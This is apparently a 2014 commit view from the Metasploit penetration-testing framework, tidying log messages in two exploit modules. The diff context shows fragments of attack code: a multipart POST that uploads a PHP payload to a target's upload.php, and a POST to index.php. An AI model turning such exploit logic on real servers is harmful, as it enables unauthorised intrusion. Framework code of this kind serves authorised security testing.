More desc fixes, add a vprint to give a hint

bug/bundler_fix
Tod Beardsley 2014-02-03 13:18:34 -06:00
parent d34020115a
commit 7e2a9a7072
No known key found for this signature in database
GPG Key ID: 1EFFB682ADB9F193
2 changed files with 3 additions and 1 deletions

View File

@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote
data.add_part(php, 'application/octet-stream', nil, "form-data; name=\"fileupload\"; filename=\"#{@fname}\"") data.add_part(php, 'application/octet-stream', nil, "form-data; name=\"fileupload\"; filename=\"#{@fname}\"")
post_data = data.to_s.gsub(/^\r\n--_Part_/, '--_Part_') post_data = data.to_s.gsub(/^\r\n--_Part_/, '--_Part_')
print_status("#{peer} - Uploading malicious file...") print_status("#{peer} - Uploading PHP payload...")
res = send_request_cgi({ res = send_request_cgi({
'method' => 'POST', 'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'upload.php'), 'uri' => normalize_uri(target_uri.path, 'upload.php'),

View File

@ -76,6 +76,8 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
uri = normalize_uri(target_uri.path.to_s, "index.php") uri = normalize_uri(target_uri.path.to_s, "index.php")
vprint_status("#{peer} - Sending request to #{uri}.")
send_request_cgi({ send_request_cgi({
'method' => 'POST', 'method' => 'POST',
'uri' => uri, 'uri' => uri,